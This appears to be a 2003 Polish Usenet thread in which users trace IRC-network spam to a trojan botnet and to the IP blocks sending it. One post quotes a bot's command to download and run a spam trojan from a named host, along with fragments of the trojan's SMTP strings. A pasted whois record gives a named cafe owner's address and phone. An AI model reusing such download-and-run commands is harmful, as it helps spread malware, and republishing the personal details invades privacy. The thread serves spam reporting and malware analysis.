Received: from 1 (unverified [195.116.29.35]) ...
Date: Wed, 18 Jun 2003 01:12:01 +0200
Subject: =?iso-8859-2?Q?Nowa_sie=E6_IRC?=
...
Chcesz ircować bez +r? Masz dosyć lagów, splitów i takeoverów?...
...
Interesujące jest to:
% This is the RIPE Whois server.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html
inetnum: 195.116.29.32 - 195.116.29.63
netname: CYBERIA-CAFE-RADOMSKO
descr: Cyberia - Cafe Ozga Arkadiusz
descr: Radomsko
country: PL
admin-c: AO490-RIPE
tech-c: HT2189-RIPE
status: ASSIGNED PA
mnt-by: TPNET
changed: x@x 20030117
source: RIPE
person: Arkadiusz Ozga
address: Cyberia - Cafe Ozga Arkadiusz
address: 97-500 Radomsko
address: ul.Piastowska 17
address: Poland
phone: +48 44 6834403
fax-no: +48 44 6834403
e-mail: oz...@poczta.fm
nic-hdl: AO490-RIPE
mnt-by: TPNET
changed: x@x 20030107
source: RIPE
PiK
> Przyszło takie (znane już chyba wszystkim):
> Received: from 1 (unverified [195.116.29.35]) ...
> Date: Wed, 18 Jun 2003 01:12:01 +0200
> Subject: =?iso-8859-2?Q?Nowa_sie=E6_IRC?=
do mnie tez :-(
From: dar...@wp.pl
ale to pewnie ściema...
a mejla nikomu nie zdradzałem oczywiście...
--
stemer [at] logosoft.pl http://birdcage.prv.pl jid:ste...@chrome.pl
"w życiu jest jak w grze w brydża - albo się ma dobrego partnera, albo dobrą
rękę."
np: winamp nie działa...
Jeszcze się nie nauczyli?
> inetnum: 195.116.29.32 - 195.116.29.63
> netname: CYBERIA-CAFE-RADOMSKO
> descr: Cyberia - Cafe Ozga Arkadiusz
> descr: Radomsko
Ojej, a taka świeżutka klasa była... ;)
--
Marcin Kulas
Dotarlem do osob mogacych zalatwic te sprawe ;)).
Jest to klasa bedaca wlasnoscia SM mieszkaniowej "Gocław" w W-wie.
Bardzo mily Pan informatyk poinformowal mnie, ze faktycznie mieli pare
zgloszen, nawet on sam dostawal ten spam...
Poprosil o przyslanie oficjalnego zgloszenia/protestu. na najblizszej radzie
spoldzielni zajma sie ta sprawa - i najprawdopodobniej ta siec osiedlowa i
siec IRC, a co za tym idzie zrodlo spamu - przestanie istniec.
Cofna im pozwolenie..
pozdr.
--
Gawus
> Dotarlem do osob mogacych zalatwic te sprawe ;)).
> Jest to klasa bedaca wlasnoscia SM mieszkaniowej "Gocław" w W-wie.
> Bardzo mily Pan informatyk poinformowal mnie, ze faktycznie mieli pare
> zgloszen, nawet on sam dostawal ten spam...
> Poprosil o przyslanie oficjalnego zgloszenia/protestu.
na jaki adres ten protest -> też się podepnę? pamiętaj aby go
"zaszyfrować" lub daj na priva (uważaj na antyspam)
--
Pozdrawiam
Lemat
http://strangeplaces.net/weirdthings/publicpool.html
Już wyjaśniam dlaczego, a w zasadzie wyjaśnię w jaki sposób crashnet
spamuje.
Tak wiec
Pamiętacie może post "spam od: matix" który zawierał w mialu następującą
treść :
<<<cut>>>>
Czesc
zapraszam na moja strone:
http://www.hypnos22.prv.pl/
A.
PS Nie zapomnij wpisac sie do Ksiegi Gosci :-)
<<<<cut - end >>>>>
Pod odpaleniu tego linka ... niby nic się nie działo ( "Proszę czekać trwa
wczytywanie strony ..." ) A tak naprawdę był odpalany skrypt javy dzięki
któremu nieświadomie łączyłeś się z IRC warszawa.crashent.pl kanał
#netrobot. Po wejściu na kanał dostajesz od bota naczelnego na priva
polecenie pobrania :
<Hypnos> !http://ocelot.wilga-iskra.com.pl/mailer9.exe
Sama nazwa mówi za siebie. Maszynka do rozsyłania spamu i nie tylko (
dosowanie, nukowanie itp ).
Po zainstalowaniu przez ofiarę mailera, wysyła ona na kanał tekst :
<shbznnab> Mailer installed
Oto co pisze na ten temat symantek
http://securityresponse.symantec.com/avcenter/venc/data/w95.tenrobot.c.html
Obecnie na kabale #netrobot jest okolo 500 takich zainfekowanych osób. Oto
kawałek kodu dekompresowanego mailera9
---
HELO %s ....wp.pl ........ MAIL FROM : <%s> ..... RCPT TO : <%s> ........
TO: <%s> .... QUIT
---
To nic innego jak fake maila.
Tak wiec teraz juz wiemy iż spamy z crashnetu przychodzą od tych właśnie
zainfekowanych osób, które sobie siedzą niewinnie na ircu i dostają komendy
do spamowania.
Taką ofiarą, była też, lub nadal jest kafejka o której pisze PiK :
> Received: from 1 (unverified [195.116.29.35]) ...
> netname: CYBERIA-CAFE-RADOMSKO
Nie wiem skąd crashnet posiada listę moich wszystkich adresów mailowych (
bo dostałem ich ostatnią reklamę na wszystkie konta ).
Najprawdopodobniej ten virus/trojan wyciągnął mi je z outloka - bo niestety
2 tygodnie temu padłem ofiarą tego badziejstwa.
Moim zdaniem to poważny problem i należałoby załatwić ich raz na zawsze.
Kanal #netrobot jest własnością najprawdopodobniej operatora o ksywce adx -
widziałem go kilka razy na kanale.
-Wnc_S
Adres to:
mmarczak 'at' wilga-iskra 'kropka' com 'kropka' pl
On zajmuje sie juz ta sprawa - pewnie kolejne zgloszenie - przyspieszy to
zajmowanie sie ;)
--
Pozdrawiam
Gawus
> Jeszcze dzisiaj www.crashnet.pl weźmie definitywny rozwód z naszą klasą
> adresową.
>Z poważaniem,
> Marek M.
No i sie panowie od IRC-a doigrali...
Wiec dziekujemy za zdecydowane reakcje i dzialania - oby tak dalej.
--
Pozdrawiam
Gawus
Tak absolutnie sie z tym zgadzamy nalezy cos z tym zrobic , wiemy
juz kto dokladnie sie tym tematem zajmuje i mamy jego adres domowy i imie
nazwisko nalezalo by teraz miec chwilke czasu i doprowadzic to do konca.
Cyberia-Cafe
--
Wysłano z serwisu OnetNiusy: http://niusy.onet.pl
Tak absolutnie sie z tym zgadzamy nalezy cos z tym zrobic , wiemy
Najpierw posprzątajcie na swoim podwórku i nie spamujcie ludzi.
--
Serwis Usenet w portalu Gazeta.pl -> http://www.gazeta.pl/usenet/
>> Jeszcze dzisiaj www.crashnet.pl weźmie definitywny rozwód z naszą klasą
>> adresową.
> No i sie panowie od IRC-a doigrali...
> Wiec dziekujemy za zdecydowane reakcje i dzialania - oby tak dalej.
Hmmm... właśnie sprawdziłem?
--
Nuta - (Odpisując mi prywatnie, usuń 'da' z mojego adresu e-mail)
Najnowsze polskie tłumaczenia programu Hamster 2.0.2.1, OE-QuoteFix,
przydatne skrypty, porady. Dla miłośników The Bat! zaawansowane
filtry spamu i poczty dla wszystkich kont: http://hamster.thebat.pl/